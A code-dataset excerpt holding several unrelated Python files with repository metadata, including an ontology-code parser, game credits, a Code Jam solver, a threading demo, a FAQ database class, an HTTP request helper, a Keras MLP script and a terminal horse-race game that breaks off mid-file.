http://identifiers.org/hgnc/\n # Convert to HGNC HGNC:\n ret = np.where((ingestSAB == 'MONDO' and x.str.contains('http://identifiers.org/hgnc')),\n 'HGNC HGNC:' + x.str.split('/').str[-1], ret)\n\n # Special cases: EDAM codes.\n # 1. When obtained from edge file for source or object nodes, EDAM IRIs are in the format\n # http://edamontology.org/_\n # e.g., http://edamontology.org/format_3750\n # 2. When obtained from node file for dbxref, EDAM codes are in the format\n # EDAM:_\n\n # Force the SAB to be EDAM and restore the underscore delimiter between domain and id.\n # ret = np.where((x.str.contains('http://edamontology.org')),\n # 'EDAM ' + x.str.replace(':', ' ').str.replace('#', ' ').str.split('/').str[-1]\n # , ret)\n\n # Case 2\n ret = np.where((x.str.contains('EDAM')), x.str.split(':').str[-1], ret)\n # Case 1\n ret = np.where((x.str.contains('edam')), 'EDAM ' + x.str.replace(' ', '_').str.split('/').str[-1], ret)\n\n # JAS JAN 2023 - Special case: Glyco Glycan\n # Glycan node IRIs are in format:\n # http://purl.jp/bio/12/glyco/glycan#(code delimited with underscore)\n # Force the SAB to be GLYCO.GLYCAN and restore the underscore delimiter between domain and id.\n ret = np.where((x.str.contains('http://purl.jp/bio/12/glyco/glycan')),\n 'GLYCO.GLYCAN ' + x.str.replace(' ', '_').str.replace('#', '/').str.split('/').str[-1], ret)\n\n # JAS JAN 2023 - Special case: Glyco Conjugate\n # Glycan node IRIs are in format:\n # http://purl.jp/bio/12/glyco/conjugate#(code delimited with underscore)\n # Force the SAB to be GLYCO.CONJUGATE and restore the underscore delimiter between domain and id.\n ret = np.where((x.str.contains('http://purl.jp/bio/12/glyco/conjugate')),\n 'GLYCO.CONJUGATE ' + x.str.replace(' ', '_').str.replace('#', '/').str.split('/').str[-1], ret)\n\n # JAS JAN 2023 - Special case: NCBI's GENE database\n # Node IRIs for genes in NCBI GENE are in format\n # http: // www.ncbi.nlm.nih.gov / gene / 19091\n # FEB 2023\n # NCBI Gene IDs are currently stored in the NCI SAB obtained from UMLS, with code IDs that\n # prepend a 'C' to the Gene ID.\n # Until we ingest NCBI Gene directly, map to NCI format.\n ret = np.where(x.str.contains('http://www.ncbi.nlm.nih.gov/gene'), 'NCI' + 'C' + x.str.split('/').str[-1], ret)\n\n # JAS JAN 2023 - Special case: NIFSTD\n # As with EDAM, Node IRIs for codes from NIFSTD show domains--e.g.,\n # http://uri.neuinfo.org/nif/nifstd/nlx_149264, where \"nlx\" is the domain\n # Unify codes under the SAB NIFSTD and restore the underscore delimiter between domain and id.\n ret = np.where(x.str.contains('http://uri.neuinfo.org/nif/nifstd'),\n 'NIFSTD' + x.str.replace(' ', '_').str.split('/').str[-1], ret)\n\n # Special case:\n # HGNC codes in expected format--i.e., that did not need to be converted above.\n # This is currently the case for UNIPROTKB.\n ret = np.where(x.str.contains('HGNC HGNC:'), x, ret)\n\n # JAS 13 JAN 2023 - Special case: UNIPROT (not to be confused with UNIPROTKB).\n # The Uniprot OWL node IRIs do not conform to OBO, so set SAB explicitly.\n ret = np.where(x.str.contains('http://purl.uniprot.org'), 'UNIPROT ' + x.str.split('/').str[-1], ret)\n\n # JAS JAN 2023 - Special case: HRAVS\n ret = np.where(x.str.contains('http://purl.humanatlas.io/valueset/'), 'HRAVS ' + x.str.split('/').str[-1], ret)\n ret = np.where(x.str.contains('Thesaurus.owl'), 'NCI ' + x.str.split('#').str[-1], ret)\n\n # JAS 12 JAN 2023 - Force SAB to uppercase.\n # The CodeId will be in format SAB , and can be mixed case.\n # can also have spaces.\n # ret is now a numpy array.\n # Split each element; convert the SAB portion to uppercase; and rejoin.\n for idx, x in np.ndenumerate(ret):\n x2 = x.split(sep=' ', maxsplit=1)\n x2[0] = x2[0].upper()\n ret[idx] = ' '.join(x2)\n return ret\n\n # original code\n # return x.str.replace('NCIT ', 'NCI ', regex=False).str.replace('MESH ', 'MSH ', regex=False) \\\n # .str.replace('GO ', 'GO GO:', regex=False) \\\n # .str.replace('NCBITaxon ', 'NCBI ', regex=False) \\\n # .str.replace('.*UMLS.*\\s', 'UMLS ', regex=True) \\\n # .str.replace('.*SNOMED.*\\s', 'SNOMEDCT_US ', regex=True) \\\n # .str.replace('HP ', 'HPO HP:', regex=False) \\\n # .str.replace('^fma', 'FMA ', regex=True) \\\n # .str.replace('Hugo.owl HGNC ', 'HGNC ', regex=False) \\\n # .str.replace('HGNC ', 'HGNC HGNC:', regex=False) \\\n # .str.replace('gene symbol report?hgnc id=', 'HGNC HGNC:', regex=False)\n","repo_name":"TaylorResearchLab/CFDE_DataDistillery","sub_path":"scripts/ubkg_utilities/parsetools.py","file_name":"parsetools.py","file_ext":"py","file_size_in_byte":7152,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73230511731","text":"\"\"\"This is the file that contains all the credits.\"\"\"\r\nimport copy\r\n\r\ncredit_order = [\r\n True, False, False, False, False, False, False, False, False,\r\n False, False, False, False, False, False, False, False, False, False,\r\n False, False, False, False, False, False, False, False, False, False,\r\n ]\r\n\r\ncredit_order_copy = [\r\n True, False, False, False, False, False, False, False, False,\r\n False, False, False, False, False, False, False, False, False, False,\r\n False, False, False, False, False, False, False, False, False, False,\r\n ]\r\n\r\nmessage = [\"\", \"Speed up the credits\", \"by pressing space\", \"\", \"Slow them down\", \"by pressing backspace\"]\r\nmessage_coor = [650, 700, 740, 780, 820, 860] # Coordinate on y-axis\r\nmessage_x = [300, 300, 300, 300, 300, 300] # Coordinate on x-axis\r\n\r\ndirectors = [\"Game directors\", \"Siem Jongsma\", \"Chen Ji Rong 'Jack' Jiang\", \"Nikki Rademaker\", \"Amarise Silié\", \"Yanna Smid\"]\r\nd_coordinates = [650, 700, 740, 780, 820, 860]\r\nd_x = [300, 300, 300, 300, 300, 300]\r\n\r\nsupervisors = [\"Supervisors\", \"Giulio Barbero\", \"Fenia Aivaloglou\", \" \", \" \", \" \"]\r\ns_coordinates = [650, 700, 750, 800, 800, 900]\r\ns_x = [300, 300, 300, 300, 300, 300]\r\n\r\ndesigners = [\"Game designers\", \"Siem Jongsma\", \"Chen Ji Rong 'Jack' Jiang\", \"Nikki Rademaker\", \"Amarise Silié\", \"Yanna Smid\"]\r\ndes_coordinates = [650, 700, 750, 800, 850, 900]\r\ndes_x = [270, 270, 270, 270, 270, 270]\r\n\r\nmusic = [\"Background music\", \"Main screens: cute\", \"Field: smile\", \"Beach: ukelele\", \"Sea: psychedelic\", \"\"]\r\nmusic_coor = [650, 750, 850, 950, 1050, 1040]\r\nmusic_x = [300, 300, 300, 300, 300, 300]\r\n\r\nmusic_2 = [\"\", \"Snow: littleidea\", \"Space: enigmatic\", \"Credit: adventure\", \"from Bensound.com\", \"\"]\r\nmusic_coor_2 = [620, 750, 850, 950, 1050, 1060]\r\nmusic_x_2 = [300, 300, 300, 300, 300, 300]\r\n\r\nmusic_program = [\"Music programming\", \"Nikki Rademaker\", \"\", \"\", \"\", \"\"]\r\nm_pr_coor = [650, 700, 730, 730, 730, 750]\r\nm_pr_x = [250, 290, 300, 300, 300, 300]\r\n\r\nbg_program = [\"Background programming\", \"Chen Ji Rong 'Jack' Jiang\", \"Yanna Smid\", \"Nikki Rademaker\", \"\", \"\"]\r\nbg_pr_coordinates = [650, 700, 740, 800, 850, 900]\r\nbg_pr_x = [200, 300, 300, 300, 300, 300]\r\n\r\ntext_program = [\"Text programming\", \"Amarise Silié\", \"Siem Jongsma\", \"Yanna Smid\", \"Chen Ji Rong 'Jack' Jiang\", \"Nikki Rademaker\"]\r\ntext_coor = [650, 700, 750, 800, 850, 900]\r\ntext_x = [245, 300, 300, 300, 300, 300]\r\n\r\nlevel_program = [\"Level programming\", \"Amarise Silié\", \"Yanna Smid\", \"Siem Jongsma\", \"Chen Ji Rong 'Jack' Jiang\", \"\"]\r\nl_pr_coor = [650, 700, 750, 800, 850, 900]\r\nl_pr_x_ = [235, 300, 300, 300, 300, 300]\r\n\r\nmulti_program = [\"Multiplayer programming\", \"Yanna Smid\", \"Nikki Rademaker\", \"Chen Ji Rong 'Jack' Jiang\", \"\", \"\", \"\"]\r\nmulti_coor = [650, 700, 750, 800, 850, 900]\r\nmulti_x = [210, 300, 300, 300, 300, 300]\r\n\r\ntimer_program = [\"Time Attack programming\", \"Siem Jongsma\", \"Amarise Silié\", \"\", \"\", \"\"]\r\ntime_coor= [650, 700, 750, 800, 850, 900]\r\ntime_x = [210, 300, 300, 300, 300, 300]\r\n\r\nbutton_program = [\"Button programming\", \"Nikki Rademaker\", \"\", \"\", \"\", \"\"]\r\nb_pr_coor = [650, 700, 750, 800, 850, 900]\r\nb_pr_x = [235, 300, 300, 300, 300, 300]\r\n\r\ncredit_program = [\"Credit programming\", \"Yanna Smid\", \"Amarise Silié\", \"\", \"\", \"\"]\r\ncred_coor = [650, 700, 750, 800, 850, 900]\r\ncred_x = [240, 300, 300, 300, 300, 300]\r\n\r\nbg_design = [\"Background designs\", \"Yanna Smid\", \"Nikki Rademaker\", \" \", \" \", \" \"]\r\nbg_coordinates = [650, 700, 750, 800, 850, 900]\r\nbg_x = [220, 300, 300, 300, 300, 300]\r\n\r\nbutton_design = [\"Button designs\", \"Nikki Rademaker\", \"Yanna Smid\", \" \", \" \", \" \"]\r\nb_coordinates = [650, 700, 750, 800, 850, 900]\r\nb_x = [280, 300, 300, 300, 300, 300]\r\n\r\nchar_design = [\"Character designs\", \"Yanna Smid\", \"Nikki Rademaker\", \"\", \"\", \"\"]\r\nchar_coor = [650, 700, 750, 800, 850, 900]\r\nchar_x = [270, 300, 300, 300, 300, 300]\r\n\r\nchar_actors = [\"Actors\", \"LEAD: Bee\", \"Monkey\", \"Penguin\", \"Nikkelien the Alien\", \"\"]\r\nactors_coor = [650, 700, 750, 800, 850, 910]\r\nactors_x = [300, 300, 300, 300, 300, 300]\r\n\r\nproducers = [\"Produced by\", \"Siem Jongsma\", \"Chen Ji Rong 'Jack' Jiang\", \"Nikki Rademaker\", \"Amarise Silié\", \"Yanna Smid\"]\r\nprod_coor = [650, 700, 750, 800, 850, 900]\r\nprod_x = [300, 300, 300, 300, 300, 300]\r\n\r\ndevelopers = [\"Developed by\", \"Siem Jongsma\", \"Chen Ji Rong 'Jack' Jiang\", \"Nikki Rademaker\", \"Amarise Silié\", \"Yanna Smid\"]\r\ndev_coor = [650, 700, 750, 800, 850, 900]\r\ndev_x = [300, 300, 300, 300, 300, 300]\r\n\r\nlast_creds = [\"Leiden University\", \"Faculty of Science\", \"Bioinformatics\", \"\", \"\", \"\"]\r\nlast_coor = [650, 700, 750, 800, 850, 900]\r\nlast_x = [270, 270, 270, 300, 300, 300]\r\n\r\nspecial_thanks = [\"Special thanks to\", \"Ourselves\", \"\", \"Friends and family\", \"who tested our program\", \"\"]\r\nspecial_coor = [650, 700, 750, 800, 850, 900]\r\nspecial_x = [230, 230, 230, 230, 230, 300]\r\n\r\nthanks = [\"Thanks for playing!\", \"\", \"Stay for the trivia!\", \"\", \"\", \"\"]\r\nthanks_coor = [650, 700, 750, 800, 850, 900]\r\nthanks_x = [230, 300, 260, 300, 300, 300]\r\n\r\ntrivia_1 = [\"Sea\", \"is the world that took\", \"the longest to draw\", \"\", \"\", \"\"]\r\ntrivia_1_coor = [650, 700, 750, 800, 850, 900]\r\ntrivia_1_x = [300, 300, 300, 300, 300, 300]\r\n\r\ntrivia_2 = [\"Level 25\", \"is the hardest to\", \"complete for the\", \"game makers\", \"\", \"\"]\r\ntrivia_2_coor = [650, 700, 750, 800, 850, 900]\r\ntrivia_2_x = [300, 300, 300, 300, 300, 300]\r\n\r\ntrivia_3 = [\"Timer high scores\", \"from the game makers\", \"easy: 48 by Amarise\", \"medium: 43 by Amarise\", \"hard: 35 by Yanna\", \"\"]\r\ntrivia_3_coor = [650, 700, 750, 800, 850, 900]\r\ntrivia_3_x = [240, 300, 300, 300, 300, 300]\r\n\r\ntrivia_4 = [\"Favorite worlds\", \"Siem: Beach\", \"Jack: Space\", \"Nikki: Beach\", \"Amarise: Sea\", \"Yanna: Snow\"]\r\ntrivia_4_coor = [650, 700, 750, 800, 850, 900]\r\ntrivia_4_x = [300, 300, 300, 300, 300, 300]\r\n\r\nall_credits = [\r\n message, directors, supervisors, designers, music, music_2, music_program, bg_program,\r\n text_program, level_program, multi_program, timer_program, button_program, credit_program,\r\n bg_design, button_design, char_design, char_actors, producers, developers, last_creds,\r\n special_thanks, thanks, trivia_1, trivia_2, trivia_3, trivia_4,\r\n ]\r\n\r\nall_coordinates = [\r\n message_coor, d_coordinates, s_coordinates, des_coordinates, music_coor, music_coor_2,\r\n m_pr_coor, bg_pr_coordinates, text_coor, l_pr_coor, multi_coor, time_coor, b_pr_coor,\r\n cred_coor, bg_coordinates, b_coordinates, char_coor, actors_coor, prod_coor, dev_coor,\r\n last_coor, special_coor, thanks_coor, trivia_1_coor, trivia_2_coor, trivia_3_coor,\r\n trivia_4_coor,\r\n ]\r\nall_coordinates_copy = copy.deepcopy(all_coordinates)\r\n\r\nall_x_coordinates = [\r\n message_x, d_x, s_x, des_x, music_x, music_x_2, m_pr_x, bg_pr_x, text_x, l_pr_x_,\r\n multi_x, time_x, b_pr_x, cred_x, bg_x, b_x, char_x, actors_x, prod_x, dev_x, last_x,\r\n special_x, thanks_x, trivia_1_x, trivia_2_x, trivia_3_x, trivia_4_x,\r\n ]\r\n","repo_name":"chenjirongjiang/Arithmekids","sub_path":"credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":6905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38257661818","text":"#!/usr/bin/env python\n\n# C.py\n\n\nfrom __future__ import print_function\nimport sys\n\nDEBUG = True\n\ndef log(*args, **kwargs):\n if not DEBUG:\n return\n kwargs[\"file\"] = sys.stderr\n print(*args, **kwargs)\n\n\n\n\ndef solver(N, M):\n def OutOfLine(X):\n return sum((X-1)/speed +1 for speed in M)\n\n def WhichBarber(X, num):\n for i, barb in enumerate(M):\n if X % barb != 0:\n continue\n if num > 1:\n num -= 1\n else:\n return i+1\n return \"fuck\"\n\n def AvailableBarbers(X):\n return [i+1 if X % m ==0 else \"x\" for i, m in enumerate(M)]\n\n low = 0\n high = (N + 1) * 100000\n while (abs(high - low) > 1):\n X = low + (high - low)/2\n val = OutOfLine(X)\n if val >= N:\n high = X\n if val < N:\n low = X\n\n log(\"~~~~~~~~~~~~~~~~~\")\n log(\"range is: (%s,%s) with bounds for %s in [%s, %s]\" % (low, high, N, OutOfLine(low), OutOfLine(high)))\n threshold_val = OutOfLine(low)\n res = N - threshold_val\n log(\"now low is even: D(%s)=%s, R(low)=%s\" % (low, threshold_val, res))\n log(\"M=\",M)\n log(\"M=\",AvailableBarbers(low))\n log(\"~~~~~~~~~~~~~~~~~\")\n return WhichBarber(low, res)\n\n\nnum_tests = input()\nfor i in range(1,num_tests+1):\n N = int(raw_input().split(\" \")[1])\n M= [int(sym) for sym in raw_input().split(\" \")]\n print(\"Case #%s: %s\" % (i, solver(N, M)))\n","repo_name":"dborzov/codejam","sub_path":"2015-round1/Problem.A/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23646558801","text":"# join\n# 主线程不等子线程,会先提前结束运行,可以通过join等待子进程\nimport threading\nfrom threading import Thread\nfrom time import sleep, time\nimport os\n\n\nclass threadFunction(Thread):\n def __init__(self, name):\n super(threadFunction, self).__init__()\n self.name = name\n\n def run(self):\n sleep(2)\n print('hello hao are you {}\\t'.format(self.name), os.getpid())\n\n\nif __name__ == \"__main__\":\n\n print(threading.currentThread())\n\n t = threadFunction('lucy')\n t1 = threadFunction('value')\n\n # 开始计时\n date_start = time()\n t.start()\n t1.start()\n\n t.join() # 子线程输出后在输出主线程\n t1.join()\n\n # 结束计时\n date_end = time() - date_start\n print('所用时间:{}'.format(date_end))\n\n print('主线程:{}'.format(os.getpid()))\n","repo_name":"xiaotiankeyi/PythonBase","sub_path":"python_processThreading/threading/threading_join.py","file_name":"threading_join.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12244256807","text":"import pymysql\n\nclass Faq():\n def __init__(self, db: pymysql.connect) -> None:\n self.db = db\n\n def insert(self, question: str, answer: str) -> bool:\n prepare = \"INSERT INTO `faq` (`question`, `answer`) VALUES (%s, %s)\"\n try:\n with self.db.cursor() as cursor:\n cursor.execute(prepare, (question, answer))\n self.db.commit()\n except:\n return False\n return True\n\n def remove(self, id: int) -> bool:\n prepare = \"DELETE FROM `faq` WHERE `id` = %s\"\n try:\n with self.db.cursor() as cursor:\n cursor.execute(prepare, (id))\n self.db.commit()\n except:\n return False\n return True\n\n def fetchall(self) -> list:\n prepare = \"SELECT `id`, `question`, `answer` FROM `faq`\"\n try:\n with self.db.cursor() as cursor:\n cursor.execute(prepare)\n result = cursor.fetchall()\n except:\n return None\n return result\n\n def close(self):\n self.db.close()\n","repo_name":"Block2School/back","sub_path":"src/database/Faq.py","file_name":"Faq.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8047205761","text":"import utils.logs as logs\nimport os\ntry:\n import requests\n requests.packages.urllib3.disable_warnings()\nexcept:\n print(\"[-]Failed to import requests module\")\n\ndef update_header_w_auth(headers):\n new_auth = os.environ['auth_header']\n headers.update({'Authorization': new_auth})\n\ndef api_request(url,method,headers,body=None):\n try:\n headers = update_header_w_auth(headers)\n except:\n #print(\"Authorization header not specified\")\n pass\n try: \n if method.upper() == \"GET\":\n auth_request = requests.get(url,headers=headers, allow_redirects=False,verify=False, timeout=10)\n elif method.upper() == \"POST\":\n auth_request = requests.post(url,headers=headers,data=body, allow_redirects=False,verify=False, timeout=10)\n elif method.upper() == \"PUT\":\n auth_request = requests.put(url,headers=headers,data=body, allow_redirects=False,verify=False, timeout=10)\n elif method.upper() == \"OPTIONS\":\n auth_request = requests.options(url,headers=headers, verify=False,timeout=10)\n return auth_request\n\n except Exception as e:\n logs.logging.error(\"Exception from sendrequest %s\",e)\n","repo_name":"flipkart-incubator/Astra","sub_path":"modules/sendrequest.py","file_name":"sendrequest.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":2365,"dataset":"github-code","pt":"37"} +{"seq_id":"15334404998","text":"import pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom sklearn.preprocessing import MinMaxScaler, LabelEncoder, OneHotEncoder\n\n\n\nclass call_weight(keras.callbacks.Callback):\n '''\n This class is to help me track the wieght of the last layer using a \n keras sequence\n '''\n # Def my own callback class so I can track the weight.\n def on_train_begin(self,logs = {}):\n self.weights = []\n def on_train_batch_end(self, batch, logs = {}):\n w = self.model.layers[2].get_weights()\n w_arr =[w[1][ 1]]\n w_arr.extend(list(w[0][:,1]))\n #self.weights.append(self.model.layers[2].get_weights())\n self.weights.append(w_arr)\n\nclass call_err(keras.callbacks.Callback):\n def on_train_begin(self, logs = {}):\n self.err_tr = []\n self.err_te = []\n \n def on_epoch_end(self,batch, logs = {}):\n pred_tr = self.model.predict(x_tr).argmax(axis = 1)\n pred_te = self.model.predict(x_te).argmax(axis = 1)\n err_tr, err_te = get_err(pred_tr, pred_te)\n self.err_tr.append(err_tr)\n self.err_te.append(err_te)\n \nclass call_loss(keras.callbacks.Callback):\n '''\n This class is to track losses.\n '''\n def on_train_begin(self, logs = {}):\n self.losses = []\n\n def on_train_batch_end(self, batch, logs = {}):\n # print(logs)\n self.losses.append(logs.get('loss'))\n \n# Build up the sequential model. \ndef MLP(hidden_layers, nodes):\n MLP = Sequential()\n for l in range(hidden_layers):\n MLP.add(Dense(nodes, activation = tf.nn.sigmoid, \n kernel_initializer = tf.initializers.RandomUniform ))\n MLP.add(Dense(10,activation = tf.nn.sigmoid, \n kernel_initializer = tf.initializers.RandomUniform ))\n return MLP\n\nMLP = MLP(2, 3)\n# Initialize the trackers.\nweight_tracker = call_weight()\nloss_tracker = call_loss()\nerr_tracker = call_err()\n\n# Compile and fit.\nMLP.compile(optimizer = keras.optimizers.SGD(learning_rate = 3), loss = 'mse', metrics = ['accuracy'])\n\nhistory = MLP.fit(x_tr,y_tr, epochs = 100, batch_size = 32,verbose = 2, callbacks = [weight_tracker, loss_tracker, err_tracker])\n\n\nf = lambda x: 1/(1+math.exp(-x))\nf(0)\nf(0.6441136)\nf(0.656)\nf(0.658)\nf(0.5)\nf(0.62)\n1.3*0.62*0.38*0.62","repo_name":"RyanYin04/MachineLearningPractice","sub_path":"Project_NN/tf_model.py","file_name":"tf_model.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74599356906","text":"\"\"\"\n@author: audrey.nicolle & emma.begard\n\"\"\"\n# Nov 2021\n# Course Hippique (version élèves)\n# Version très basique, sans mutex sur l’écran, sans arbitre, sans annoncer le gagnant, ... ...\n# −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n# VT100 : Actions sur le curseur\n# Quelques codes d’échappement (tous ne sont pas utilisés)\nCLEARSCR=\"\\x1B[2J\\x1B[;H\" # Clear SCReen\nCLEAREOS = \"\\x1B[J\" # Clear End Of Screen\nCLEARELN = \"\\x1B[2K\" # Clear Entire LiNe\nCLEARCUP = \"\\x1B[1J\" # Clear Curseur UP\nGOTOYX = \"\\x1B[%.2d;%.2dH\" # (’H’ ou ’f’) : Goto at (y,x), voir le code\nDELAFCURSOR = \"\\x1B[K\" # effacer après la position du curseur\nCRLF = \"\\r\\n\" # Retour à la ligne\nCURSON = \"\\x1B[?25h\" # Curseur visible\nCURSOFF = \"\\x1B[?25l\" # Curseur invisible\n# VT100 : Actions sur les caractères affichables\nNORMAL = \"\\x1B[0m\" # Normal\nBOLD = \"\\x1B[1m\" # Gras\nUNDERLINE = \"\\x1B[4m\" # Souligné\n# VT100 : Couleurs : \"22\" pour normal intensity\nCL_BLACK=\"\\033[22;30m\" # Noir. NE PAS UTILISER. On verra rien !!\nCL_RED=\"\\033[22;31m\" # Rouge\nCL_GREEN=\"\\033[22;32m\" # Vert\nCL_BROWN = \"\\033[22;33m\" # Brun\nCL_BLUE=\"\\033[22;34m\" # Bleu\nCL_MAGENTA=\"\\033[22;35m\" # Magenta\nCL_CYAN=\"\\033[22;36m\" # Cyan\nCL_GRAY=\"\\033[22;37m\" # Gris\n# \"01\" pour quoi ? (bold ?)\nCL_DARKGRAY=\"\\033[01;30m\" # Gris foncé\nCL_LIGHTRED=\"\\033[01;31m\" # Rouge clair\nCL_LIGHTGREEN=\"\\033[01;32m\" # Vert clair\nCL_YELLOW=\"\\033[01;33m\" # Jaune\nCL_LIGHTBLU= \"\\033[01;34m\" # Bleu clair\nCL_LIGHTMAGENTA=\"\\033[01;35m\" # Magenta clair\nCL_LIGHTCYAN=\"\\033[01;36m\" # Cyan clair\nCL_WHITE=\"\\033[01;37m\" # Blanc\n#−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n# Juin 2019\n# Cours hippique\n# Version très basique, sans mutex sur l’écran, sans arbitre, sans annoncer le gagant, ... ...\n# Quelques codes d’échappement (tous ne sont pas utilisés)\nCLEARSCR=\"\\x1B[2J\\x1B[;H\" # Clear SCReen\nCLEAREOS = \"\\x1B[J\" # Clear End Of Screen\nCLEARELN = \"\\x1B[2K\" # Clear Entire LiNe\nCLEARCUP = \"\\x1B[1J\" # Clear Curseur UP\nGOTOYX = \"\\x1B[%.2d;%.2dH\" # (’H’ ou ’f’) : Goto at (y,x), voir le code\nDELAFCURSOR = \"\\x1B[K\" # effacer après la position du curseur\nCRLF = \"\\r\\n\" # Retour à la ligne\n# VT100 : Actions sur le curseur\nCURSON = \"\\x1B[?25h\" # Curseur visible\nCURSOFF = \"\\x1B[?25l\" # Curseur invisible\n# VT100 : Actions sur les caractères affichables\nNORMAL = \"\\x1B[0m\" # Normal\nBOLD = \"\\x1B[1m\" # Gras\nUNDERLINE = \"\\x1B[4m\" # Souligné\n# VT100 : Couleurs : \"22\" pour normal intensity\nCL_BLACK=\"\\033[22;30m\" # Noir. NE PAS UTILISER. On verra rien !!\nCL_RED=\"\\033[22;31m\" # Rouge\nCL_GREEN=\"\\033[22;32m\" # Vert\nCL_BROWN = \"\\033[22;33m\" # Brun\nCL_BLUE=\"\\033[22;34m\" # Bleu\nCL_MAGENTA=\"\\033[22;35m\" # Magenta\nCL_CYAN=\"\\033[22;36m\" # Cyan\nCL_GRAY=\"\\033[22;37m\" # Gris\n# \"01\" pour quoi ? (bold ?)\nCL_DARKGRAY=\"\\033[01;30m\" # Gris foncé\nCL_LIGHTRED=\"\\033[01;31m\" # Rouge clair\nCL_LIGHTGREEN=\"\\033[01;32m\" # Vert clair\nCL_YELLOW=\"\\033[01;33m\" # Jaune\nCL_LIGHTBLU= \"\\033[01;34m\" # Bleu clair\nCL_LIGHTMAGENTA=\"\\033[01;35m\" # Magenta clair\nCL_LIGHTCYAN=\"\\033[01;36m\" # Cyan clair\nCL_WHITE=\"\\033[01;37m\" # Blanc\n#−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n\n# Import-----------------------------------------------------------------\nimport multiprocessing as mp\nfrom multiprocessing import Manager\nfrom multiprocessing import managers\nimport os, time,math, random, sys, ctypes\nfrom pickle import FALSE, TRUE\nfrom urllib import request\n# Une liste de couleurs à affecter aléatoirement aux chevaux\nlyst_colors=[CL_WHITE, CL_RED, CL_GREEN, CL_BROWN , CL_BLUE, CL_MAGENTA, CL_CYAN, CL_GRAY,\nCL_DARKGRAY, CL_LIGHTRED, CL_LIGHTGREEN, CL_LIGHTBLU, CL_YELLOW, CL_LIGHTMAGENTA, CL_LIGHTCYAN]\n\n#Fonctions --------------------------------------------------------------\n\ndef effacer_ecran() : print(CLEARSCR,end=\"\")\n\ndef erase_line_from_beg_to_curs() : print(\"\\033[1K\",end=\"\")\n\ndef curseur_invisible() : print(CURSOFF,end=\"\")\n\ndef curseur_visible() : print(CURSON,end=\"\")\n\ndef move_to(lig, col) : print(\"\\033[\" + str(lig) + \";\" + str(col) + \"f\",end=\"\")\n\ndef en_couleur(Coul) : print(Coul,end=\"\")\n\ndef en_rouge() : print(CL_RED,end=\"\") # Un exemple !\n\ndef liste(tab):\n \"\"\" Création de la liste pour le classement des chevaux\n Parameters:\n entrée : \n tab : positoin des chevaux dans l'ordre croissant\n \"\"\"\n chevaux_pos = [] \n for a in range(0, len(tab)):\n chevaux_pos .append( [chr(ord(\"A\")+a),tab[a]] )\n return chevaux_pos\n \ndef up_date(tab, liste):\n \"\"\" cette fonction met à jour la position des chevaux dans la liste qui contient le classement\n parametres : \n entrées:\n tab : liste des position sdes chevaux dans l'ordre alphabétique\n listre: la liste du classement à mettre à jour\n \"\"\"\n # on met a jour les positions de chevaux\n for i in range(len(liste)) :\n # on cherche le nom du cheval a mettre a jour dans tab\n for l in range(len(tab)):\n # si le nom du cheval correspond on met sa position a jour\n if liste[i][0] ==str(chr(ord(\"A\")+l)):\n liste[i][1] = tab[i]\n \n return liste\n\ndef tri(lst) :\n \"\"\" cette fonction tri les chevaux dans l'ordre décroissant\n paramatres :\n entrée :\n lst : la liste de listes [cheval, position] à trier\n \"\"\"\n for i in range(0, len(lst)):\n for l in range(i,len(lst)):\n if lst[i][1] < lst[l][1]:\n lst[i], lst[l]= lst[l], lst[i]\n return lst\n\ndef disp_scores(lst, pos):\n \"\"\" cette fonction affiche les scores\n Parametres :\n entrée :\n lst : liste du classmeent \n pos : la ligne d'affichage sur le terminal\n \"\"\"\n premier = 0\n deuxieme = 0\n troisieme = 0\n dernier = 0\n move_to(pos, 2)\n en_couleur(CL_WHITE)\n # pour eviter d'afficher qui n'xistent pas et causer des erreurs d'index dans la liste\n if len(lst) <= 2:\n premier = lst[0][0]\n deixieme = lst[1][0]\n troisieme = 'aucun'\n\n elif len(lst) <= 1:\n premier = lst[0][0]\n deixieme = 'aucun'\n troisieme = 'aucun'\n\n else :\n premier = lst[0][0]\n deuxieme = lst[1][0]\n troisieme = lst[2][0]\n\n print(\"Premier :{} , Deuxième:{}, Troisième:{}, Dernier : {}\".format(premier,deuxieme,troisieme, lst[len(lst)-1][0] ))\n\ndef arbitre(tab, fin, lettre, parie, Nb_process) : \n \"\"\" cette fonction affiche le classment et l'affichage du pari\n Paramtres :\n entrées :\n tab : position des chevaux dans l'rdre alphabetique \n fin : la position de fin de course\n lettre : le cheval sur leque le joueur a parié\n parie : un booléen qui indique si le joueur a parié ou pas\n Nb_process : nombre de chevaux+1 qiu courent, pour gerer l'afichage dans arbitre\n \"\"\"\n # on crée l aliste des chevaux avec leurs positions\n result = liste(tab)\n # tant que le troisième cheval n'est pas arrivé \n while result[-1][1] < fin-1 :\n # on met a jour la liste\n result = up_date(tab, result)\n # on tri la liste avec des colones decroissantes\n result=tri(result)\n # on affiche les resultats\n disp_scores(result, (Nb_process-1)*4+4)\n pari(result, lettre, parie, (Nb_process-1)*4+3)\n # si le joueur a parié\n if parie== True :\n move_to((Nb_process-1)*4+5,2)\n en_couleur(CL_WHITE)\n # la chevl a gagné\n if result[0][0] == lettre:\n print(\" Le cheval {} a gagné !!!! \".format(lettre))\n\n # le cheval du pari n'a pas gagné\n else :\n print(\" Le cheval {} n'as pas gagné \".format(lettre))\n\ndef 